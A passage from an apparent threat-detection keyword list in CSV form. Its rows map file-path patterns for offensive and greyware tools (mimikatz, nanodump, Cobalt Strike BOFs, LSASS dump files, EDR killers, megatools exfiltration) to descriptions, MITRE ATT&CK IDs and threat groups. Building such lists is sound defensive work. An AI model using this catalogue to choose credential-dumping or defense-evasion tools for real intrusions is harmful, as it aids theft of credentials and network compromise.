T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*\Koh\Koh.*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*\krb5\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*\Ladon.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*\Ladon.ps1*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*\lansearch.exe*","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*\laps.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\LAPSDumper\*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"*\ldap_search_bof.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*\ldap-checker.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\LibSnaffle*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","0","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*\Loader\Loader.csproj*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*\local_admins.csv*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\LocalPrivEsc\*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\LogonScreen.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*\lsass.DMP","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*\lsass.dmp*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*\lsass.dmp*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*\LSASSProtectionBypass\*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*\lsassy_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\m3-gen.py*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"*\MaccaroniC2*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*\MachineAccountQuota.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\macoffe.pdb*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\malseclogon.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*\MalStuff.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*\malware_runner.py*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*\manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*\masky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\master\GPSCoordinates\*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\Mayhem.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\megatools-*-win64\*","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9",,"N/A",,, +"*\megatools.exe*","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9",,"N/A",,, +"*\mem_dll.pdb*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\met_inject.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\mhydeath64*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*\mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*\mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*\Mockingjay_BOF.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" +"*\modifiableautorun.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*\monkey.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*\monkey32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*\monkey64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*\ms17-010.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Mshikaki.cpp*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" +"*\msi_search.c*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msi_search.exe*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msi_search.ps1*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msi_search.x64.o*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msi_search.x86.o*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msol.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\MSOL\DomainCompanyInfo.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*\mssql_priv.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"*\nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*\nanodump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\net*\ftpagent.exe*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" +"*\net.exe"" accounts*","greyware_tool_keyword","net","Enumerate local accounts","T1087.001 - T1003","TA0007 - 